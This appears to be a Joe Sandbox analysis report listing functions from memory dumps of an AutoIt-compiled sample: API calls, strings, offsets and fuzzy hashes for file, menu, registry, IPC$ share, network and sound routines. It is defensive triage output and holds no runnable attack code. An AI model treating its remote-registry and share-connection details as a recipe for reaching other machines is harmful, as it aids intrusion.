Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 5c003b86c407189719b0ad3f703cc20850421d21108b3a959f89f640605ef5cb
Instruction ID: 4af22e6ec98618dcf0b881c7540b10a93bc25b0b5f8b16f8ea4a8fbe2d8f43a9
Opcode Fuzzy Hash: 5c003b86c407189719b0ad3f703cc20850421d21108b3a959f89f640605ef5cb
Instruction Fuzzy Hash: 3A416A72800309ABDF15FBE1DD86EEEB778AF18700F500465F505B6092EA396F09EB61

Function 0101BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,01019207,?,?), ref: 0101BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BA85
GlobalLock.KERNEL32(00000000), ref: 0101BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BA9D
GlobalUnlock.KERNEL32(00000000), ref: 0101BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,01022CAC,?), ref: 0101BAD7
GlobalFree.KERNEL32(00000000), ref: 0101BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 0101BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0101BB36
DeleteObject.GDI32(00000000), ref: 0101BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0101BB74

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 9e2398bea5a4f862a95a53bddb5f081e6f77ad8f3b9a3ca39a0c5edd5dc49401
Instruction ID: 99d12d59721000ea69df6c85de21bbc530479d7250c40ad8a9325ce0d5e25fcb
Opcode Fuzzy Hash: 9e2398bea5a4f862a95a53bddb5f081e6f77ad8f3b9a3ca39a0c5edd5dc49401
Instruction Fuzzy Hash: AB416B75600209EFDB21DFA9DC88EAA7BF8FF89711F104058F989D7254C7799905CB20

Function 00FFD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00FFDA10
_wcscat.LIBCMT ref: 00FFDA28
_wcscat.LIBCMT ref: 00FFDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FFDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00FFDA63
GetFileAttributesW.KERNEL32(?), ref: 00FFDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00FFDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00FFDAA7

Strings

*.*, xrefs: 00FFDAE6

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 448f6272ad08acdc9c4c2949be370514391083ebfa429bc39d77e758db4ba384
Instruction ID: 10bc44d46c9649c85d3a4100ad118423b996490ba267a4c79cd44173eda4d165
Opcode Fuzzy Hash: 448f6272ad08acdc9c4c2949be370514391083ebfa429bc39d77e758db4ba384
Instruction Fuzzy Hash: 5181C4729043099FCB34DFA4C844ABAB7E9BF89354F14482EF589C7221E774D944EB52

Function 0101C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0101C1FC
GetFocus.USER32 ref: 0101C20C
GetDlgCtrlID.USER32(00000000), ref: 0101C217
_memset.LIBCMT ref: 0101C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0101C36D
GetMenuItemCount.USER32(?), ref: 0101C38D
GetMenuItemID.USER32(?,00000000), ref: 0101C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0101C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0101C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0101C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0101C489

Strings

0, xrefs: 0101C33A

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: f7b5b76869a56d9cdfbd36b7134d34ae0ad270f8327c26461650667c555d944d
Instruction ID: 411cafafd5e1b09d6dd3d81f0726d347441a6d86a9842da30c557c5731161642
Opcode Fuzzy Hash: f7b5b76869a56d9cdfbd36b7134d34ae0ad270f8327c26461650667c555d944d
Instruction Fuzzy Hash: 4E81AF702883119FE761CF28C984AABBBE8FB88714F00495DFAD597295DB39D904CB52

Function 0100731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0100738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0100739B
CreateCompatibleDC.GDI32(?), ref: 010073A7
SelectObject.GDI32(00000000,?), ref: 010073B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01007408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01007444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01007468
SelectObject.GDI32(00000006,?), ref: 01007470
DeleteObject.GDI32(?), ref: 01007479
DeleteDC.GDI32(00000006), ref: 01007480
ReleaseDC.USER32(00000000,?), ref: 0100748B

Strings

(, xrefs: 01007410

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: dfbe4dc1aecdc16211444dee22bb9efefd325a1cb82e37399ee72468bc9dc9a6
Instruction ID: 9f4c38844264c3d0713c5517dda53c1449d9654ba448ab437a3c609e0c0a301f
Opcode Fuzzy Hash: dfbe4dc1aecdc16211444dee22bb9efefd325a1cb82e37399ee72468bc9dc9a6
Instruction Fuzzy Hash: 45515B75900309EFEB25CFA8D885EAEBBB9EF48310F14841DF99997250C739A944CB50

Function 00F96A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00FB0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F96B0C,?,00008000), ref: 00FB0973

Part of subcall function 00F94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F94743,?,?,00F937AE,?), ref: 00F94770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F96BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00F96CFA

Part of subcall function 00F9586D: _wcscpy.LIBCMT ref: 00F958A5

Part of subcall function 00FB363D: _iswctype.LIBCMT ref: 00FB3645

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 00FCE421
AU3!, xrefs: 00F96B61
>>>AUTOIT SCRIPT<<<, xrefs: 00FCE496
Error opening the file, xrefs: 00FCE43D, 00FCE4B8
EA06, xrefs: 00FCE452
Unterminated string, xrefs: 00FCE7E4
Bad directive syntax error, xrefs: 00FCE79D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 480fc8138ebc22468474783df3e25525a725b68719c14502d93c8a0740d0295f
Instruction ID: f6a705282f775f42f262aba9a5028a6c358bbe74aff702e9880ab5675ee43a38
Opcode Fuzzy Hash: 480fc8138ebc22468474783df3e25525a725b68719c14502d93c8a0740d0295f
Instruction Fuzzy Hash: 5D02BB315083419FDB25EF20C881EAFBBE5AF98314F14491EF499972A1DB38D949EB42

Function 00FF2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00FF2DDD
GetMenuItemCount.USER32(01055890), ref: 00FF2E66
DeleteMenu.USER32(01055890,00000005,00000000,000000F5,?,?), ref: 00FF2EF6
DeleteMenu.USER32(01055890,00000004,00000000), ref: 00FF2EFE
DeleteMenu.USER32(01055890,00000006,00000000), ref: 00FF2F06
DeleteMenu.USER32(01055890,00000003,00000000), ref: 00FF2F0E
GetMenuItemCount.USER32(01055890), ref: 00FF2F16
SetMenuItemInfoW.USER32(01055890,00000004,00000000,00000030), ref: 00FF2F4C
GetCursorPos.USER32(?), ref: 00FF2F56
SetForegroundWindow.USER32(00000000), ref: 00FF2F5F
TrackPopupMenuEx.USER32(01055890,00000000,?,00000000,00000000,00000000), ref: 00FF2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FF2F7E

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: aa169f8c4265dd56f995a1fbea194c257a95f3c9c980464e7102452418f4b365
Instruction ID: b6c0f8ae3632c559f7944cf05dd8be1be9885dad902dfedc091a7dceba585865
Opcode Fuzzy Hash: aa169f8c4265dd56f995a1fbea194c257a95f3c9c980464e7102452418f4b365
Instruction Fuzzy Hash: 6371C271A0020ABAEB619F54DC85FBABF64FF04764F200216F715AA1F1C7B55820EB94

Function 00FE77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

_memset.LIBCMT ref: 00FE786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FE78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FE78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FE78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FE7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FE792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FE7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FE793A

Strings

\CLSID, xrefs: 00FE7822
SOFTWARE\Classes\, xrefs: 00FE780C
\IPC$, xrefs: 00FE7882

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: d8a273737c9c62f4ca46f897c62f5bc61af251ff36e8c9589dcd38064415b51f
Instruction ID: 3ffa99455d977f0421089f98c7a1d2184f84a05871d08048303f91642efac43e
Opcode Fuzzy Hash: d8a273737c9c62f4ca46f897c62f5bc61af251ff36e8c9589dcd38064415b51f
Instruction Fuzzy Hash: 2E411572C14229ABDF21EFA5DC85DEEB7B8BF14710F404029F805A7161EB399E08DB90

Function 01010E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0100FDAD,?,?), ref: 01010E31

Strings

HKEY_USERS, xrefs: 01010F32
HKCU, xrefs: 01010F21
HKLM, xrefs: 01010EAF
HKEY_CURRENT_USER, xrefs: 01010F10
HKCC, xrefs: 01010EFF
HKEY_CLASSES_ROOT, xrefs: 01010EC4
HKCR, xrefs: 01010ED9
HKU, xrefs: 01010F43
HKEY_CURRENT_CONFIG, xrefs: 01010EEE
HKEY_LOCAL_MACHINE, xrefs: 01010E9A

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: db2648d18f2f878924010c0362b8565e73e677d2f9f3ab7b9dd9b371e29b007d
Instruction ID: 3a3aac79fe4544109fd0e699eb1f94e60827706f1293036b850ae8265c1e178a
Opcode Fuzzy Hash: db2648d18f2f878924010c0362b8565e73e677d2f9f3ab7b9dd9b371e29b007d
Instruction Fuzzy Hash: A741467110024A8BDF01FE14DC96AEF37A4BF45308F144869FCD51B69ADB3D9999CBA0

Function 00FEF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FCE2A0,00000010,?,Bad directive syntax error,0101F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FEF7C2
LoadStringW.USER32(00000000,?,00FCE2A0,00000010), ref: 00FEF7C9

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

_wprintf.LIBCMT ref: 00FEF7FC
__swprintf.LIBCMT ref: 00FEF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FEF88D

Strings

Line %d (File "%s"):, xrefs: 00FEF833
., xrefs: 00FEF873
Error: , xrefs: 00FEF85B
%s (%d) : ==> %s.: %s %s, xrefs: 00FEF7F7
Line %d:, xrefs: 00FEF818

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: a43ce12d8265246e633359c360529dd722b25839dc9e888f1629906646d6a552
Instruction ID: 6e7e5345ed3ea11f203f3471e99b86e30207bc34c3bb22f0979623dfd68a020c
Opcode Fuzzy Hash: a43ce12d8265246e633359c360529dd722b25839dc9e888f1629906646d6a552
Instruction Fuzzy Hash: D421717295031AABDF12FFA1CC4AEED7779BF18300F04486AF50566061EA39A618EB50

Function 00FF52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

Part of subcall function 00F97924: _memmove.LIBCMT ref: 00F979AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FF5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FF5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FF5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FF5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FF537A

Strings

status PlayMe mode, xrefs: 00FF532B
open , xrefs: 00FF52DF
close PlayMe, xrefs: 00FF5341, 00FF536E
play PlayMe wait, xrefs: 00FF5364
play PlayMe, xrefs: 00FF5375
alias PlayMe, xrefs: 00FF5309

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 19e8b00d2a895190e97740cf81cc16469bfce274870592f473886113582cf94e
Instruction ID: 80ffc8c3c87fe2591d5d204e741cc67bb2503ac1e5fd6a1c226688ccacba3a48
Opcode Fuzzy Hash: 19e8b00d2a895190e97740cf81cc16469bfce274870592f473886113582cf94e
Instruction Fuzzy Hash: 4711E670E5031D7AEB60F6A6DC89DFF7B7CFF95F50F00082A7501A60A1E9A04C04D560

Function 00FF46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00FF46D2
gethostname.WSOCK32(?,00000100), ref: 00FF46EC
gethostbyname.WSOCK32(?), ref: 00FF46F9
_wcscpy.LIBCMT ref: 00FF4721
_memmove.LIBCMT ref: 00FF4734
inet_ntoa.WSOCK32(?), ref: 00FF473F
_strcat.LIBCMT ref: 00FF474D
_wcscpy.LIBCMT ref: 00FF4764
WSACleanup.WSOCK32 ref: 00FF4772
_wcscpy.LIBCMT ref: 00FF4780

Strings

0.0.0.0, xrefs: 00FF471B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: f20821567562add1c0d440a272f15b0eb4fcc32c941017918d8ebf203af81b7c
Instruction ID: 1fd8f5fa7c201dc0366508e618c3873c67248c1aacabca7ac3ed316cf8fe4019
Opcode Fuzzy Hash: f20821567562add1c0d440a272f15b0eb4fcc32c941017918d8ebf203af81b7c
Instruction Fuzzy Hash: DB112B329041196FCB20BB319C4AEEF77BCEF05721F0401A6F985D6061EF79D985AB50

Function 00FF4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00FF4F7A

Part of subcall function 00FB049F: timeGetTime.WINMM(?,76C1B400,00FA0E7B), ref: 00FB04A3

Sleep.KERNEL32(0000000A), ref: 00FF4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00FF4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FF4FEC
SetActiveWindow.USER32 ref: 00FF500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FF5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00FF5038
Sleep.KERNEL32(000000FA), ref: 00FF5043
IsWindow.USER32 ref: 00FF504F
EndDialog.USER32(00000000), ref: 00FF5060

Strings

BUTTON, xrefs: 00FF4FDE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: be1c97697109baa17d630038d56131eef59cd7516c731acb2c008cae32da54ed
Instruction ID: 91e2de4800590dc39e218a396c5fb49d1cbe3a7eef2a8b95bbd09f98b6ae5e39
Opcode Fuzzy Hash: be1c97697109baa17d630038d56131eef59cd7516c731acb2c008cae32da54ed
Instruction Fuzzy Hash: 93217F7064470AAFE7315F60EC88B373B69EF4A799F041114F285821A9CB7F9D44EB61

Function 00FFD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

CoInitialize.OLE32(00000000), ref: 00FFD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FFD67D
SHGetDesktopFolder.SHELL32(?), ref: 00FFD691
CoCreateInstance.OLE32(01022D7C,00000000,00000001,01048C1C,?), ref: 00FFD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FFD74C
CoTaskMemFree.OLE32(?,?), ref: 00FFD7A4
_memset.LIBCMT ref: 00FFD7E1
SHBrowseForFolderW.SHELL32(?), ref: 00FFD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FFD840
CoTaskMemFree.OLE32(00000000), ref: 00FFD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FFD87E
CoUninitialize.OLE32(00000001,00000000), ref: 00FFD880

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
